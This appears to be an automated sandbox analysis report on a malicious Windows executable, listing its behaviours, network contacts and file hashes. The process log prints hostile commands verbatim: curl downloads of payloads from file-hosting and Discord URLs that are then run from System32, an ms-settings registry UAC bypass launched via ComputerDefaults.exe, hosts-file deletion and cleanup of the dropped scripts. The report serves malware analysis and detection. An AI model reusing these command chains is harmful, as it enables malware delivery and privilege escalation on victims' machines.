Analysis Overview
SHA256
f63734e8c099081fb6f7386aaa960667e297a0b323d7b583d1a2cfcd974353dd
Threat Level: Likely malicious
The file usermode.exe was found to be: Likely malicious.
Malicious Activity Summary
Downloads MZ/PE file
VMProtect packed file
Executes dropped EXE
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Enumerates physical storage devices
Unsigned PE
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-30 13:56
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-30 13:56
Reported
2024-10-30 13:57
Platform
win11-20241007-en
Max time kernel
20s
Max time network
22s
Command Line
Signatures
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\secret.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\secret.exe | C:\Windows\system32\curl.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\168587.vbs" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\542700.vbs" | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\usermode.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\usermode.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\usermode.exe
"C:\Users\Admin\AppData\Local\Temp\usermode.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl "https://files.catbox.moe/zalgwe.bin" --output "C:\Windows\System32\secret.exe" >nul 2>&1
C:\Windows\system32\curl.exe
curl "https://files.catbox.moe/zalgwe.bin" --output "C:\Windows\System32\secret.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\secret.exe
C:\Windows\System32\secret.exe
C:\Windows\System32\secret.exe
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\542700.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\542700.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\542700.vbs
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\542700.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\168587.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\168587.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\168587.vbs
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C start C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe jwah3vi8udplil4pnbtk5lm9cw9p1w:uBXGGIIoaOA3aw5m7pLMX006:matchashop.icu
C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe jwah3vi8udplil4pnbtk5lm9cw9p1w:uBXGGIIoaOA3aw5m7pLMX006:matchashop.icu
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\168587.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl "https://cdn.discordapp.com/attachments/1263645426599596164/1293915367185580053/dukedennis.otf?ex=67091c17&is=6707ca97&hm=681743a411446d1716303f04ab6b576ca7b42f46779ab825121f40f4a198b70a" --output "C:\dukedennis.otf" >nul 2>&1
C:\Windows\system32\curl.exe
curl "https://cdn.discordapp.com/attachments/1263645426599596164/1293915367185580053/dukedennis.otf?ex=67091c17&is=6707ca97&hm=681743a411446d1716303f04ab6b576ca7b42f46779ab825121f40f4a198b70a" --output "C:\dukedennis.otf"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| N/A | 127.0.0.1:49751 | tcp | |
| US | 8.8.8.8:53 | 35.20.181.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.21.192.23.in-addr.arpa | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 172.67.220.187:443 | matchashop.icu | tcp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| US | 104.21.79.145:443 | textpubshiers.top | tcp |
| N/A | 127.0.0.1:49798 | tcp | |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
Files
memory/3908-0-0x00007FF7BA1B7000-0x00007FF7BA518000-memory.dmp
memory/3908-1-0x00007FF8E1A70000-0x00007FF8E1A72000-memory.dmp
memory/3908-2-0x00007FF7BA160000-0x00007FF7BAA79000-memory.dmp
memory/3908-5-0x00007FF7BA160000-0x00007FF7BAA79000-memory.dmp
C:\Windows\System32\secret.exe
| MD5 | 68487b48506703ac72bf48e57a5f6ffa |
| SHA1 | 7eb5a51f8ecead1e555d79db58bb43e61264b51b |
| SHA256 | f3ecc9924b3a625fcc54d59008706e41c830c6952bf836e77352a340251c8cae |
| SHA512 | 033f745e1c289ad4cd69b1494962fd6260484cb300c7556d76635908dbc5f54e626b5c21e130058c5d84b5978eff3628dd6fd8b56e35bf37c0a6f866ffb8cbb0 |
memory/3400-10-0x000001F6A0400000-0x000001F6A0401000-memory.dmp
memory/3400-11-0x000001F6A0410000-0x000001F6A0411000-memory.dmp
memory/3400-12-0x000001F6A1D20000-0x000001F6A1D21000-memory.dmp
memory/3908-14-0x00007FF7BA1B7000-0x00007FF7BA518000-memory.dmp
memory/3908-15-0x00007FF7BA160000-0x00007FF7BAA79000-memory.dmp
memory/3400-16-0x000001F6A1D40000-0x000001F6A1D41000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\542700.vbs
| MD5 | 8b4ed5c47fdddbeba260ef11cfca88c6 |
| SHA1 | 868f11f8ed78ebe871f9da182d053f349834b017 |
| SHA256 | 170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5 |
| SHA512 | 87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf |
C:\Users\Admin\AppData\Local\Temp\168587.vbs
| MD5 | 0b4570ab9e0b9b3a1c729d2dfe4269cf |
| SHA1 | d8f47021a2000ec2160cfceeb59654d28d3b7ba4 |
| SHA256 | d4aec27b2377d3267c10348eaacfaa97dbb2ca0c3f0f5170d905301a77ae0f9d |
| SHA512 | 0adf851c389281cbd1c28a6ac08691179dec2a536f1d68ce46a621e5d234dbb5cd826aaea2193a674e1396fdaa745f21fba9988cb2cb19736d0c153f3b86422e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe
| MD5 | 925efe96cdd4c38990ce77cf97f5218f |
| SHA1 | 6deeb34ba43549ac8a7d6b545257e6df64e29495 |
| SHA256 | c0f88af9fb0d75921f09ead45882adb82a2b1222d728de0f10ae8a875ee757a4 |
| SHA512 | 3d7a24dea82a9908ed599680dbe1caeadbee5cb04aa06a4c6310ceccd8f98f8ca9f0666434d48945e44ec48c3f4ef21d3c23df4252b4d5792995a4b1892014d3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8
| MD5 | 971c514f84bba0785f80aa1c23edfd79 |
| SHA1 | 732acea710a87530c6b08ecdf32a110d254a54c8 |
| SHA256 | f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895 |
| SHA512 | 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
| MD5 | bd34d3e89ca124297388a6e74ba69449 |
| SHA1 | 54742685dfa4f520e2e93b2024629c91c925ccfb |
| SHA256 | 4173a607877121ad103b1018726634f0d28bf6ca7ac86be683f162a6abbacd7b |
| SHA512 | 700573da5a8fb38ee6fc9f92b45f33d2d2a0ac6610eb572ef0cb164c686164d5dbdf07e1012606f57cad64102b00fc443fa9c1031d517d0d7c9cf5ab8593eb2d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12
| MD5 | 67e486b2f148a3fca863728242b6273e |
| SHA1 | 452a84c183d7ea5b7c015b597e94af8eef66d44a |
| SHA256 | facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb |
| SHA512 | d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
| MD5 | 3bf53b7cb0ef14526332140e3f06e30e |
| SHA1 | 73684a2e322f714d3cf7396cc467f4b2fbe48c60 |
| SHA256 | 63d7227e22957e115ece214bf46e427d95782e2ed7c5be04b43bad30a50d9014 |
| SHA512 | 82728bb630791419f845e5a1a9a67b210fb4065f9603616aca1d9446d080028a0a64bed10d5e405f453e32fbf5d31fb020a9ec38ba9ca01e843c97fe437c3eee |